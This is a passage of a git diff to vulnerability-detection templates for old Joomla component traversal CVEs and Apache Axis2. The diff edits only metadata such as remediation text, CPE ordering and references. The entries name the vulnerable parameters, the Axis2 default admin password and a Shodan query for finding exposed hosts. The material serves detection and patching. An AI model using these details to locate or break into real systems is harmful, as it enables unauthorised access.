https://nvd.nist.gov/vuln/detail/CVE-2009-5114 - http://websecurity.com.ua/2628/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/74321 - remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2009-5114 cwe-id: CWE-22 epss-score: 0.03309 - cpe: cpe:2.3:a:iwork:webglimpse:*:*:*:*:*:*:*:* epss-percentile: 0.90068 + cpe: cpe:2.3:a:iwork:webglimpse:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: iwork diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index eda20a81c4..4387e6bef7 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -5,19 +5,19 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/10943 - https://nvd.nist.gov/vuln/detail/CVE-2010-0157 - http://packetstormsecurity.org/1001-exploits/joomlabiblestudy-lfi.txt - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-0157 cwe-id: CWE-22 epss-score: 0.00826 - cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* epss-percentile: 0.79783 + cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index 6f0a9bd55e..a264be8142 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service. + remediation: | + Disable or restrict access to the Axis2 web interface, or apply the necessary patches or updates provided by the vendor. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-0219 - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html @@ -17,13 +19,13 @@ info: cve-id: CVE-2010-0219 cwe-id: CWE-255 epss-score: 0.97513 - cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:* epss-percentile: 0.99971 + cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.html:"Apache Axis" vendor: apache product: axis2 + shodan-query: http.html:"Apache Axis" tags: cve,cve2010,axis,apache,default-login,axis2 http: diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index bcd75ba059..d9c63a2666 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -5,21 +5,21 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php. + remediation: Apply all relevant security patches and upgrades. reference: - https://www.exploit-db.com/exploits/11282 - https://nvd.nist.gov/vuln/detail/CVE-2010-0467 - http://www.chillcreations.com/en/blog/ccnewsletter-joomla-newsletter/ccnewsletter-106-security-release.html - http://www.exploit-db.com/exploits/11277 - http://www.exploit-db.com/exploits/11282 - remediation: Apply all relevant security patches and upgrades. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 cve-id: CVE-2010-0467 cwe-id: CWE-22 epss-score: 0.0586 - cpe: cpe:2.3:a:chillcreations:com_ccnewsletter:1.0.5:*:*:*:*:*:*:* epss-percentile: 0.92444 + cpe: cpe:2.3:a:chillcreations:com_ccnewsletter:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: chillcreations diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index 28e76eca65..d56a13d928 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11447 - https://nvd.nist.gov/vuln/detail/CVE-2010-0696 - http://www.joomlaworks.gr/content/view/77/34/ - http://www.exploit-db.com/exploits/11447 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-0696 cwe-id: CWE-22 epss-score: 0.79015 - cpe: cpe:2.3:a:joomlaworks:jw_allvideos:3.0:*:*:*:*:*:*:* epss-percentile: 0.97844 + cpe: cpe:2.3:a:joomlaworks:jw_allvideos:3.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomlaworks diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index ab8215fc97..356f8f51cb 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11498 - https://nvd.nist.gov/vuln/detail/CVE-2010-0759 - http://www.exploit-db.com/exploits/11498 - https://exchange.xforce.ibmcloud.com/vulnerabilities/56380 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-0759 cwe-id: CWE-22 epss-score: 0.01326 - cpe: cpe:2.3:a:greatjoomla:scriptegrator_plugin:1.4.1:*:*:*:*:*:*:* epss-percentile: 0.84334 + cpe: cpe:2.3:a:greatjoomla:scriptegrator_plugin:1.4.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: greatjoomla diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index b85b9eb83a..14f7b665fa 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11089 - https://nvd.nist.gov/vuln/detail/CVE-2010-0942 - http://packetstormsecurity.org/1001-exploits/joomlajvideodirect-traversal.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/55513 - remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-0942 cwe-id: CWE-22 epss-score: 0.00477 - cpe: cpe:2.3:a:jvideodirect:com_jvideodirect:*:*:*:*:*:*:*:* epss-percentile: 0.72681 + cpe: cpe:2.3:a:jvideodirect:com_jvideodirect:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jvideodirect diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml index b7b1f53746..2cfac5a06e 100644 --- a/http/cves/2010/CVE-2010-0943.yaml +++ b/http/cves/2010/CVE-2010-0943.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php. + remediation: | + Update to the latest version of Joomla! Component com_jashowcase to fix the directory traversal vulnerability. reference: - https://www.exploit-db.com/exploits/11090 - https://nvd.nist.gov/vuln/detail/CVE-2010-0943 @@ -15,8 +17,8 @@ info: cve-id: CVE-2010-0943 cwe-id: CWE-22 epss-score: 0.01155 - cpe: cpe:2.3:a:joomlart:com_jashowcase:*:*:*:*:*:*:*:* epss-percentile: 0.8306 + cpe: cpe:2.3:a:joomlart:com_jashowcase:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomlart diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index 8d90247b5c..fd05da7897 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -5,21 +5,21 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11088 - https://nvd.nist.gov/vuln/detail/CVE-2010-0944 - http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt - http://www.exploit-db.com/exploits/11088 - https://exchange.xforce.ibmcloud.com/vulnerabilities/55514 - remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-0944 cwe-id: CWE-22 epss-score: 0.00477 - cpe: cpe:2.3:a:thorsten_riess:com_jcollection:*:*:*:*:*:*:*:* epss-percentile: 0.72681 + cpe: cpe:2.3:a:thorsten_riess:com_jcollection:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: thorsten_riess diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index 4ac36c9526..1f7566b1a3 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11738 - https://nvd.nist.gov/vuln/detail/CVE-2010-0972 - http://www.exploit-db.com/exploits/11738 - https://exchange.xforce.ibmcloud.com/vulnerabilities/56863 - remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-0972 cwe-id: CWE-22 epss-score: 0.00813 - cpe: cpe:2.3:a:g4j.laoneo:com_gcalendar:2.1.5:*:*:*:*:*:*:* epss-percentile: 0.79614 + cpe: cpe:2.3:a:g4j.laoneo:com_gcalendar:2.1.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: g4j.laoneo diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml index b1a147a542..95e78bfedb 100644 --- a/http/cves/2010/CVE-2010-0982.yaml +++ b/http/cves/2010/CVE-2010-0982.yaml @@ -5,18 +5,18 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/10942 - https://nvd.nist.gov/vuln/detail/CVE-2010-0982 - remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2010-0982 cwe-id: CWE-22 epss-score: 0.0087 - cpe: cpe:2.3:a:joomlamo:com_cartweberp:1.56.75:*:*:*:*:*:*:* epss-percentile: 0.80286 + cpe: cpe:2.3:a:joomlamo:com_cartweberp:1.56.75:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomlamo diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index 59f6badc38..876879408c 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/10948 - https://nvd.nist.gov/vuln/detail/CVE-2010-0985 - http://www.exploit-db.com/exploits/10948 - https://exchange.xforce.ibmcloud.com/vulnerabilities/55348 - remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-0985 cwe-id: CWE-22 epss-score: 0.01222 - cpe: cpe:2.3:a:chris_simon:com_abbrev:1.1:*:*:*:*:*:*:* epss-percentile: 0.83609 + cpe: cpe:2.3:a:chris_simon:com_abbrev:1.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: chris_simon diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml index ac622ba08b..c18d4f94b9 100644 --- a/http/cves/2010/CVE-2010-1056.yaml +++ b/http/cves/2010/CVE-2010-1056.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11760 - https://nvd.nist.gov/vuln/detail/CVE-2010-1056 - http://www.rockettheme.com/extensions-updates/638-rokdownloads-10-released - https://exchange.xforce.ibmcloud.com/vulnerabilities/56898 - remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1056 cwe-id: CWE-22 epss-score: 0.06484 - cpe: cpe:2.3:a:rockettheme:com_rokdownloads:*:*:*:*:*:*:*:* epss-percentile: 0.92801 + cpe: cpe:2.3:a:rockettheme:com_rokdownloads:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rockettheme diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index ff16e60b4a..4a6961094a 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml @@ -5,19 +5,19 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11511 - https://nvd.nist.gov/vuln/detail/CVE-2010-1081 - http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html - remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1081 cwe-id: CWE-22 epss-score: 0.02282 - cpe: cpe:2.3:a:corejoomla:com_communitypolls:*:*:*:*:*:*:*:* epss-percentile: 0.88237 + cpe: cpe:2.3:a:corejoomla:com_communitypolls:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: corejoomla diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index 0d5e24027d..74078c9f09 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. + remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11814 - https://nvd.nist.gov/vuln/detail/CVE-2010-1217 - http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt - http://www.exploit-db.com/exploits/11814 - remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2010-1217 cwe-id: CWE-22 epss-score: 0.01155 - cpe: cpe:2.3:a:je_form_creator:je_form_creator:*:*:*:*:*:*:*:* epss-percentile: 0.8306 + cpe: cpe:2.3:a:je_form_creator:je_form_creator:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: je_form_creator diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index 0d53aecfd1..d199908f5f 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -5,19 +5,19 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11757 - https://nvd.nist.gov/vuln/detail/CVE-2010-1219 - https://exchange.xforce.ibmcloud.com/vulnerabilities/56901 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1219 cwe-id: CWE-22 epss-score: 0.00813 - cpe: cpe:2.3:a:com_janews:com_janews:1.0:*:*:*:*:*:*:* epss-percentile: 0.79614 + cpe: cpe:2.3:a:com_janews:com_janews:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: com_janews diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index 6042d130fb..f87a80beed 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -5,18 +5,18 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11978 - https://nvd.nist.gov/vuln/detail/CVE-2010-1302 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1302 cwe-id: CWE-22 epss-score: 0.01204 - cpe: cpe:2.3:a:decryptweb:com_dwgraphs:1.0:*:*:*:*:*:*:* epss-percentile: 0.83479 + cpe: cpe:2.3:a:decryptweb:com_dwgraphs:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: decryptweb diff --git a/http/cves/2010/CVE-2010-1304.yaml b/http/cves/2010/CVE-2010-1304.yaml index 2a74ba40c0..9e106a3906 100644 --- a/http/cves/2010/CVE-2010-1304.yaml +++ b/http/cves/2010/CVE-2010-1304.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11998 - https://nvd.nist.gov/vuln/detail/CVE-2010-1304 - http://www.exploit-db.com/exploits/11998 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57483 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1304 cwe-id: CWE-22 epss-score: 0.0045 - cpe: cpe:2.3:a:joomlamo:com_userstatus:1.21.16:*:*:*:*:*:*:* epss-percentile: 0.71928 + cpe: cpe:2.3:a:joomlamo:com_userstatus:1.21.16:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomlamo diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index 834fd8fc16..684a1965c8 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml @@ -5,21 +5,21 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12065 - https://nvd.nist.gov/vuln/detail/CVE-2010-1305 - http://extensions.joomla.org/extensions/e-commerce/shopping-cart/7951 - http://www.vupen.com/english/advisories/2010/0811 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57538 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1305 cwe-id: CWE-22 epss-score: 0.03203 - cpe: cpe:2.3:a:joomlamo:com_jinventory:1.23.02:*:*:*:*:*:*:* epss-percentile: 0.89919 + cpe: cpe:2.3:a:joomlamo:com_jinventory:1.23.02:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomlamo diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index 43ddb17e35..eb484f39f1 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -5,19 +5,19 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12058 - https://nvd.nist.gov/vuln/detail/CVE-2010-1306 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57508 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1306 cwe-id: CWE-22 epss-score: 0.01242 - cpe: cpe:2.3:a:roberto_aloi:com_joomlapicasa2:2.0.0:*:*:*:*:*:*:* epss-percentile: 0.83796 + cpe: cpe:2.3:a:roberto_aloi:com_joomlapicasa2:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: roberto_aloi diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index 364695dd94..746c9ae464 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12070 - https://nvd.nist.gov/vuln/detail/CVE-2010-1307 - http://www.vupen.com/english/advisories/2010/0806 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57531 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1307 cwe-id: CWE-22 epss-score: 0.01751 - cpe: cpe:2.3:a:software.realtyna:com_joomlaupdater:1.0:*:*:*:*:*:*:* epss-percentile: 0.86395 + cpe: cpe:2.3:a:software.realtyna:com_joomlaupdater:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: software.realtyna diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index df94e58133..4dcd078cc5 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -5,19 +5,19 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12066 - https://nvd.nist.gov/vuln/detail/CVE-2010-1308 - http://www.vupen.com/english/advisories/2010/0809 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1308 cwe-id: CWE-22 epss-score: 0.01334 - cpe: cpe:2.3:a:la-souris-verte:com_svmap:1.1.1:*:*:*:*:*:*:* epss-percentile: 0.84366 + cpe: cpe:2.3:a:la-souris-verte:com_svmap:1.1.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: la-souris-verte diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index 7dbcb66435..75dabb124e 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -5,19 +5,19 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12077 - https://nvd.nist.gov/vuln/detail/CVE-2010-1312 - http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1312 cwe-id: CWE-22 epss-score: 0.01155 - cpe: cpe:2.3:a:ijoomla:com_news_portal:1.5.1:*:*:*:*:*:*:* epss-percentile: 0.8306 + cpe: cpe:2.3:a:ijoomla:com_news_portal:1.5.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ijoomla diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index 42dfb4018b..c1b8c445b8 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -5,19 +5,19 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12082 - https://nvd.nist.gov/vuln/detail/CVE-2010-1313 - http://www.exploit-db.com/exploits/12082 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2010-1313 cwe-id: CWE-22 epss-score: 0.0045 - cpe: cpe:2.3:a:seber:com_sebercart:1.0.0.12:*:*:*:*:*:*:* epss-percentile: 0.71928 + cpe: cpe:2.3:a:seber:com_sebercart:1.0.0.12:*:*:*:*:*:*:* metadata: max-request: 1 vendor: seber diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index b74928bff0..463dc69efc 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -5,19 +5,19 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12086 - https://nvd.nist.gov/vuln/detail/CVE-2010-1314 - http://packetstormsecurity.org/1004-exploits/joomlahsconfig-lfi.txt - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1314 cwe-id: CWE-22 epss-score: 0.00477 - cpe: cpe:2.3:a:joomlanook:com_hsconfig:1.5:*:*:*:*:*:*:* epss-percentile: 0.72681 + cpe: cpe:2.3:a:joomlanook:com_hsconfig:1.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomlanook diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml index 356f274fdb..6afc40fd4a 100644 --- a/http/cves/2010/CVE-2010-1315.yaml +++ b/http/cves/2010/CVE-2010-1315.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: 